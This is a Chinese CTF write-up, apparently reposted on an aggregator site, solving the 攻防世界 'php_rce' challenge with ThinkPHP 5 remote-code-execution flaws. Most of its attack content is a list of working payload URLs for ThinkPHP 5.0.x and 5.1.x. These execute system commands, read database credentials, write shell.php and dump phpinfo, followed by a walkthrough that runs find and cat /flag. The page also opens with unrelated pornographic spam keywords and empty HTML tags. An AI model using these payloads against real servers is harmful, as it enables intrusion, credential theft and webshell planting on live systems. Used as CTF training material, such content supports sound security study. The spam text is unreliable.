国产无码综合区,色欲AV无码国产永久播放,无码天堂亚洲国产AV,国产日韩欧美女同一区二区

<label id="qvwaj"></label>

<mark id="qvwaj"><xmp id="qvwaj"><kbd id="qvwaj"></kbd>

<mark id="qvwaj"><xmp id="qvwaj"><rp id="qvwaj"><dfn id="qvwaj"><input id="qvwaj"></input></dfn></rp>

[CTF/網(wǎng)絡(luò)安全] 攻防世界 php_rce 解題詳析

2年前作者：秋說(shuō)分類：Toy博客閱讀(23)違法舉報(bào)

這篇具有很好參考價(jià)值的文章主要介紹了[CTF/網(wǎng)絡(luò)安全] 攻防世界 php_rce 解題詳析。希望對(duì)大家有所幫助。如果存在錯(cuò)誤或未考慮完全的地方，請(qǐng)大家不吝賜教，您也可以點(diǎn)擊"舉報(bào)違法"按鈕提交疑問(wèn)。

php_rce,# CTF賽題,網(wǎng)絡(luò)安全,web安全,CTF,php,遠(yuǎn)程RCE,網(wǎng)絡(luò)安全

PHP REC

PHP RCE 指的是通過(guò)遠(yuǎn)程代碼執(zhí)行漏洞（Remote Code Execution）來(lái)攻擊 PHP 程序的一種方式。簡(jiǎn)單來(lái)說(shuō)，由于PHP應(yīng)用程序沒(méi)有正確處理外部輸入數(shù)據(jù)（如用戶提交的表單、請(qǐng)求參數(shù)等），攻擊者通過(guò)某些手段向 PHP 應(yīng)用程序中注入惡意代碼，然后通過(guò)這些惡意代碼實(shí)現(xiàn)對(duì)受攻擊服務(wù)器的控制。

下面簡(jiǎn)單介紹一種常見(jiàn)的遠(yuǎn)程 RCE 漏洞利用方式，即利用 PHP 中的 eval 函數(shù)實(shí)現(xiàn) RCE 的方式。在該示例中，攻擊者可以通過(guò) HTTP 請(qǐng)求向目標(biāo)服務(wù)器傳遞 PHP 代碼，并執(zhí)行該代碼：

// 服務(wù)端代碼
$user_input = $_GET['user_input']; // 沒(méi)有對(duì)輸入進(jìn)行過(guò)濾
eval('$result = ' . $user_input . ';'); // 遠(yuǎn)程代碼執(zhí)行

// 攻擊者構(gòu)造惡意代碼
http://example.com/index.php?user_input=system('ls%20-la');
//遠(yuǎn)程執(zhí)行 "ls -la" 命令。

由于服務(wù)器代碼沒(méi)有對(duì) user_input 的內(nèi)容進(jìn)行過(guò)濾和驗(yàn)證，攻擊者可以通過(guò) user_input 參數(shù)發(fā)送任意 PHP 代碼，并將其作為一個(gè)字符串傳遞給 eval 函數(shù)進(jìn)行執(zhí)行，成功實(shí)現(xiàn)ls -la命令。
在 Unix/Linux 系統(tǒng)中，ls -la 命令可以列出當(dāng)前目錄下的所有文件和子目錄，并顯示它們的詳細(xì)信息，包括權(quán)限、創(chuàng)建時(shí)間、大小等等。

ThinkPHP V5漏洞Payload

thinkphp 5.0.22

1、http://192.168.1.1/thinkphp/public/?s=.|think\config/get&name=database.username
2、http://192.168.1.1/thinkphp/public/?s=.|think\config/get&name=database.password
3、http://url/to/thinkphp_5.0.22/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=id
4、http://url/to/thinkphp_5.0.22/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1

thinkphp 5

1、http://127.0.0.1/tp5/public/?s=index/\think\View/display&content=%22%3C?%3E%3C?php%20phpinfo();?%3E&data=1

thinkphp 5.0.21

1、http://localhost/thinkphp_5.0.21/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=id
2、http://localhost/thinkphp_5.0.21/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1

thinkphp 5.1.

1、http://url/to/thinkphp5.1.29/?s=index/\think\Request/input&filter=phpinfo&data=1
2、http://url/to/thinkphp5.1.29/?s=index/\think\Request/input&filter=system&data=cmd
3、http://url/to/thinkphp5.1.29/?s=index/\think\template\driver\file/write&cacheFile=shell.php&content=%3C?php%20phpinfo();?%3E
4、http://url/to/thinkphp5.1.29/?s=index/\think\view\driver\Php/display&content=%3C?php%20phpinfo();?%3E
5、http://url/to/thinkphp5.1.29/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1
6、http://url/to/thinkphp5.1.29/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cmd
7、http://url/to/thinkphp5.1.29/?s=index/\think\Container/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1
8、http://url/to/thinkphp5.1.29/?s=index/\think\Container/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cmd

5.0.20

1、http://localhost/thinkphp_5.0.21/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=id

姿勢(shì)

使用thinkphp 5.1.payload，
URL + /?s=index/\think\Container/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls
回顯如下：
php_rce,# CTF賽題,網(wǎng)絡(luò)安全,web安全,CTF,php,遠(yuǎn)程RCE,網(wǎng)絡(luò)安全
提示使用5.0.20版本Payload
URL + /?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls
回顯如下：

php_rce,# CTF賽題,網(wǎng)絡(luò)安全,web安全,CTF,php,遠(yuǎn)程RCE,網(wǎng)絡(luò)安全
說(shuō)明命令執(zhí)行成功
接著抓取flag即可
PayloadURL + /?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=find / -name "flag"

由上圖可知，flag字段儲(chǔ)存在flag文件夾下的flag文件中

使用cat命令讀取flag
PayloadURL + /?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cat /flag

命令解析及詳析姿勢(shì)參考：[CTF/網(wǎng)絡(luò)安全] 攻防世界 command_execution 解題詳析

回顯如下：
php_rce,# CTF賽題,網(wǎng)絡(luò)安全,web安全,CTF,php,遠(yuǎn)程RCE,網(wǎng)絡(luò)安全

總結(jié)

該題結(jié)合部分Linux命令考察ThinkPHP V5漏洞
我是秋說(shuō)，我們下次見(jiàn)。文章來(lái)源地址http://www.zghlxwxcb.cn/news/detail-739818.html

到了這里，關(guān)于[CTF/網(wǎng)絡(luò)安全] 攻防世界 php_rce 解題詳析的文章就介紹完了。如果您還想了解更多內(nèi)容，請(qǐng)?jiān)谟疑辖撬阉鱐OY模板網(wǎng)以前的文章或繼續(xù)瀏覽下面的相關(guān)文章，希望大家以后多多支持TOY模板網(wǎng)！

本文來(lái)自互聯(lián)網(wǎng)用戶投稿，該文觀點(diǎn)僅代表作者本人，不代表本站立場(chǎng)。本站僅提供信息存儲(chǔ)空間服務(wù)，不擁有所有權(quán)，不承擔(dān)相關(guān)法律責(zé)任。如若轉(zhuǎn)載，請(qǐng)注明出處：如若內(nèi)容造成侵權(quán)/違法違規(guī)/事實(shí)不符，請(qǐng)點(diǎn)擊違法舉報(bào)進(jìn)行投訴反饋，一經(jīng)查實(shí)，立即刪除！

分享到：

領(lǐng)支付寶紅包贊助服務(wù)器費(fèi)用

[CTF/網(wǎng)絡(luò)安全] 攻防世界 file_include 解題詳析（php偽協(xié)議+convert轉(zhuǎn)換過(guò)濾器）
題目描述：怎么讀取文件呢？思路：由代碼審計(jì)可知，可通過(guò)filename參數(shù)構(gòu)造POC，來(lái)讀取check.php POC的構(gòu)造涉及PHP偽協(xié)議，參考鏈接：文件包含 | PHP偽協(xié)議實(shí)戰(zhàn) POC：回顯如下：猜測(cè)被過(guò)濾，怎么辦呢？該題涉及到 convert轉(zhuǎn)換過(guò)濾器常見(jiàn)的convert轉(zhuǎn)換過(guò)濾器有這兩種：
2024年02月07日
瀏覽(24)
[CTF/網(wǎng)絡(luò)安全] 攻防世界 Web_php_include 解題詳析(php偽協(xié)議、data偽協(xié)議、file偽協(xié)議)
這段代碼首先通過(guò) show_source(__FILE__) 顯示當(dāng)前文件的源代碼，然后通過(guò) $_GET[\\\'hello\\\'] 顯示 URL 參數(shù)中名為 hello 的值。接下來(lái)，代碼使用 $_GET[\\\'page\\\'] 獲取 URL 參數(shù)中名為 “page” 的值，并進(jìn)行字符串替換，將 php:// 替換為空字符串這是為了防止通過(guò) URL 參數(shù)加載本地文件或其他可
2024年02月08日
瀏覽(28)
[CTF/網(wǎng)絡(luò)安全]攻防世界 easyupload 解題詳析
題目描述：一名合格的黑客眼中，所有的上傳點(diǎn)都是開(kāi)發(fā)者留下的后門慣例，上傳一句話木馬回顯如下：也就是說(shuō)文件被過(guò)濾抓包改后綴，.php1~.php9、.htaccess均被過(guò)濾（.htaccess 文件是一個(gè)用于配置 Apache Web 服務(wù)器的配置文件。它通常位于網(wǎng)站根目錄或特定目錄中，用來(lái)為該
2024年02月08日
瀏覽(14)
[CTF/網(wǎng)絡(luò)安全] 攻防世界 cookie 解題詳析
題目描述：X老師告訴小寧他在cookie里放了些東西，小寧疑惑地想：這是夾心餅干的意思嗎？根據(jù)提示，獲取頁(yè)面Cookie中的數(shù)據(jù)即可頁(yè)面提示 look here:cookie.php ，于是GET /cookie.php ：提示查看HTTP響應(yīng) method 1 HTTP響應(yīng)通?？梢栽跒g覽器的開(kāi)發(fā)者工具中找到。按下F12鍵打開(kāi)瀏覽器
2024年02月05日
瀏覽(21)
[CTF/網(wǎng)絡(luò)安全] 攻防世界 backup 解題詳析
題目描述：X老師忘記刪除備份文件，他派小寧同學(xué)去把備份文件找出來(lái),一起來(lái)幫小寧同學(xué)吧！ PHP 腳本文件的備份文件名，通常采用以下命名方式：在原始文件名后添加日期時(shí)間戳。例如，如果要備份名為 index.php 的文件，則可以將其備份文件命名為 index_20230521_004017.php。這
2024年02月05日
瀏覽(17)
[CTF/網(wǎng)絡(luò)安全] 攻防世界 wife_wife 解題詳析
該題涉及Java Script原型鏈污染：JavaScript 原型鏈污染講解可以看到，后端編程語(yǔ)言為Node.js，簡(jiǎn)單來(lái)講，通過(guò) newUser.__proto__ 可以訪問(wèn)到新對(duì)象的原型未污染時(shí)：污染時(shí)：我們以知識(shí)點(diǎn)的利用為主，查看源代碼：若isAdmin的屬性是true，則它為管理員，否則為普通用戶；于是我
2024年02月06日
瀏覽(67)
[CTF/網(wǎng)絡(luò)安全] 攻防世界 view_source 解題詳析
題目描述：X老師讓小寧同學(xué)查看一個(gè)網(wǎng)頁(yè)的源代碼，但小寧同學(xué)發(fā)現(xiàn)鼠標(biāo)右鍵好像不管用了。單擊鼠標(biāo)右鍵，點(diǎn)擊查看頁(yè)面源代碼：使用瀏覽器菜單：不同的瀏覽器可能會(huì)在不同的位置提供查看頁(yè)面源代碼的選項(xiàng)。以Firefox為例，打開(kāi)應(yīng)用程序菜單即可：使用快捷鍵：幾乎
2024年02月13日
瀏覽(27)
[CTF/網(wǎng)絡(luò)安全] 攻防世界 weak_auth 解題詳析
題目描述：小寧寫了一個(gè)登陸驗(yàn)證頁(yè)面，隨手就設(shè)了一個(gè)密碼。 weak_auth翻譯：弱認(rèn)證這個(gè)術(shù)語(yǔ)通常用來(lái)描述一種較弱的安全認(rèn)證方法或機(jī)制，它可能存在安全漏洞，易受到攻擊或者被繞過(guò)。在信息安全領(lǐng)域中，弱認(rèn)證是一種常見(jiàn)的安全威脅。例如，使用簡(jiǎn)單的密碼或者未加
2024年02月13日
瀏覽(23)
[CTF/網(wǎng)絡(luò)安全] 攻防世界 disabled_button 解題詳析
題目描述：X老師今天上課講了前端知識(shí)，然后給了大家一個(gè)不能按的按鈕，小寧驚奇地發(fā)現(xiàn)這個(gè)按鈕按不下去，到底怎么才能按下去呢？題目提示前端知識(shí) ，由HTML相關(guān)知識(shí)可知，該按鈕即input標(biāo)簽不能提交的原因有以下六種：沒(méi)有包含在表單中： input 標(biāo)簽必須包含在表
2024年02月07日
瀏覽(23)
[CTF/網(wǎng)絡(luò)安全] 攻防世界 command_execution 解題詳析
題目描述：小寧寫了個(gè)ping功能,但沒(méi)有寫waf,X老師告訴她這是非常危險(xiǎn)的，你知道為什么嗎。 ping 命令是一個(gè)常用的網(wǎng)絡(luò)命令，用于測(cè)試兩臺(tái)計(jì)算機(jī)之間網(wǎng)絡(luò)連接的連通性。通過(guò)向目標(biāo)計(jì)算機(jī)發(fā)送 ICMP 協(xié)議的數(shù)據(jù)包，并等待目標(biāo)計(jì)算機(jī)返回響應(yīng)數(shù)據(jù)包來(lái)測(cè)試網(wǎng)絡(luò)的可達(dá)性，同時(shí)
2024年02月06日
瀏覽(24)